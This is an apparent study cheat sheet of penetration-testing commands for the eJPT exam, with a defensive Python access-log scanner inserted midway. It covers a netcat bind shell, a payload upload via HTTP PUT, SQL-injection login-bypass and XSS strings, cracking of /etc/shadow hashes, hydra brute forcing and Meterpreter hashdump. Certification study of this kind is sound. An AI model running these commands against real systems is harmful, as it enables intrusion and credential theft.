eJPT Useful Commands

Useful Commands for eJPT exam and basic pentesting

Use Kali to create a simple & quick HTTP server:
Can be used to download malicious files to victim if outbound port open.

python -m SimpleHTTPServer 8080

SimpleHTTPServer is the Python 2 module; on Python 3 the equivalent is:

python3 -m http.server 8080

DNS Enumeration:

sublist3r enumerates subdomains, so it takes a domain name rather than an IP:

sublist3r -d example.com

Footprinting & Scanning:

fping -a -g -q x.x.x.x/x
nmap -sN x.x.x.x/x

Other common nmap options: -sV -sS -sN -A -O -p- -pN -V -vv

Vulnerability Assessment:

/bin/systemctl start nessusd.service

Then head over to https://localhost:8834

Banner Grabbing:

nc x.x.x.x <port>
HEAD / HTTP/1.0
(press ENTER twice: the empty line terminates the request headers)

Common HTTP Verbs to try:

GET /page.php HTTP/1.1
Host: www.example.com

POST /login.php HTTP/1.1
Host: www.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

username=example&password=example

PUT /path/to/destination HTTP/1.1
Host: www.example.com

DELETE /path/to/destination HTTP/1.1
Host: www.example.com

OPTIONS / HTTP/1.1
Host: www.example.com

The PUT command can be exploited to allow us to upload a payload to a victim site. In order to do this, we need to know the size of the payload in bytes (Content-Length counts bytes, so use wc -c rather than wc -m, which counts characters). For example, we have a payload.php:

wc -c payload.php
20 payload.php (our payload is 20 bytes)

With our payload size known we can now upload the file to our victim site. Note the empty line between the headers and the body:

nc victim.site 80
PUT /payload.php HTTP/1.1
Host: victim.site
Content-Type: text/html
Content-Length: 20

<?php *payload* ?>

Remote Shell with NetCat:

On “client” side (listens on a port and hands out a shell; the port number is required):

nc -lvp <port> -e /bin/bash

On “server” side:

nc -v 127.0.0.1 <port>

Send a file via NetCat:

client side:

cat file.txt | nc -v 127.0.0.1 8888

server side:

nc -lvp 8888 > received.txt

Directories and File Enumeration:

I like dirb for directories and dirbuster for file enumerations :)

Dirbuster is GUI Based

Automatically uses default wordlist: dirb <target>
Custom wordlist: dirb <target> /path/to/wordlist
Proxy option: dirb <target> -p <proxy>
Cookies option: dirb <target> -c "cookie"
Credentials: dirb <target> -u "user:password"
Search for extensions: dirb <target> -X ".txt,.bak"

XSS Detection:

Find areas where input is required. XSS can be checked by simply adding a tag like <h1>, <p> or <script> and seeing if it is rendered or executed.

<script> alert('XSS Vulnerable') </script>

Automatic XSS scanning can be done with OWASP ZAP Proxy.

SQL Injection:

To exploit a SQL injection, you first have to find injection points: places where we can craft a payload. To identify an injection point, you have to test user-supplied input.

example.com/get.php?id=1

We can test by appending and 1=1;-- - to the id value and seeing if the request is still successful.

Once we find an injection point, we can use sqlmap to scan the webserver to find other injection points:

sqlmap -u http://example.com/get.php?id=1

This scan will give us other injection points and payloads we can use.

Other sqlmap commands:

sqlmap -u http://example.com/get.php?id=1 --tables
sqlmap -u http://example.com/get.php?id=1 -D <database> -T <table> --dump

Always try to bypass login forms with ' or 1=1;-- -
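As a defender-side companion to the HTTP verb, XSS and SQL injection probes above, here is an added example (not from the original page) that scans web-server access-log lines for those same patterns: write-capable methods such as PUT/DELETE, tautology-style SQLi tests like and 1=1;-- -, and tag-based XSS tests like <script>. The log layout, the regexes and the sample log lines are assumptions of this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original page), in the
# Apache/nginx "combined"-style layout that LOG_RE below parses.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "PUT /payload.php HTTP/1.1" 201 0
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /get.php?id=1%20and%201=1;--%20- HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /search.php?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 128
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "OPTIONS / HTTP/1.1" 200 0
10.0.0.7 - - [01/Jan/2024:10:00:06 +0000] "DELETE /path/to/destination HTTP/1.1" 405 0
"""

LOG_RE = re.compile(r'^\S+ \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Verbs from the banner-grabbing section that a browser-driven site rarely needs.
RISKY_METHODS = {"PUT", "DELETE", "OPTIONS"}
# Probe shapes from the page: tautology-style SQLi tests and tag-based XSS tests.
SQLI_RE = re.compile(r"(\bor\b|\band\b)\s+1\s*=\s*1|'\s*or\b|;--", re.IGNORECASE)
XSS_RE = re.compile(r"<\s*(script|h1|p)\b", re.IGNORECASE)


def classify(line):
    """Return finding tags for one access-log line (empty list if nothing matched)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    findings = []
    method, status = m.group("method"), m.group("status")
    path = unquote_plus(m.group("path"))  # decode %xx and '+' before matching
    if method in RISKY_METHODS:
        # 2xx on PUT/DELETE means the server honoured the write; OPTIONS answering
        # 200 is normal, so that one is only reported as present.
        accepted = method != "OPTIONS" and status.startswith("2")
        findings.append("risky-method-accepted" if accepted else "risky-method")
    if SQLI_RE.search(path):
        findings.append("sqli-probe")
    if XSS_RE.search(path):
        findings.append("xss-probe")
    return findings


def scan(log_text):
    """Map 1-based line numbers to findings, skipping lines with nothing to report."""
    report = {}
    for n, line in enumerate(log_text.splitlines(), 1):
        tags = classify(line)
        if tags:
            report[n] = tags
    return report
```

Running scan(SAMPLE_LOG) flags the accepted PUT on line 2 separately from the rejected DELETE, which is the difference between a server that merely answers a risky verb and one that actually honoured it.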

BurpSuite:

Use the built-in proxy to intercept traffic and map the website. Check response codes to find hidden files, scripts, directories and hard-coded credentials.

Intruder can be used to bruteforce

Password Cracking:

Common areas to check
/etc/passwd
/etc/shadow

Combine those two with:

unshadow passwd shadow > crack

Run John The Ripper to crack hashes:

john crack

Authentication Cracking:

Bruteforce authentication protocols such as telnet, ssh, ftp, smb, http

hydra -L userslist.txt -P passwords.txt <service://server> <options>

Null Sessions:

Remotely exploitable: this lets an attacker connect to a local or remote share on Windows without authentication.

enum4linux -A x.x.x.x

A <20> type record in the output tells us that the file sharing service is up and running on the machine.

We can then use smbclient to gather more info and access remote shares:

smbclient -L WORKGROUP -I x.x.x.x -N -U ""
smbclient \\\\x.x.x.x\\*sharename* -N

Metasploit:

msfdb init
msfconsole
db_nmap -sV x.x.x.x

Can use Metasploit to find vulnerabilities, services, and ports that are open to exploitation.

Common Metasploit commands:

set payload windows/meterpreter/reverse_tcp
search
back
show options
use <module>
set <option> <value>
help
sessions -l
sessions -i <id>

Common Meterpreter commands after successful exploitation:

getuid
getsystem
hashdump
sysinfo
route
pwd
shell
ls
getprivs
getpid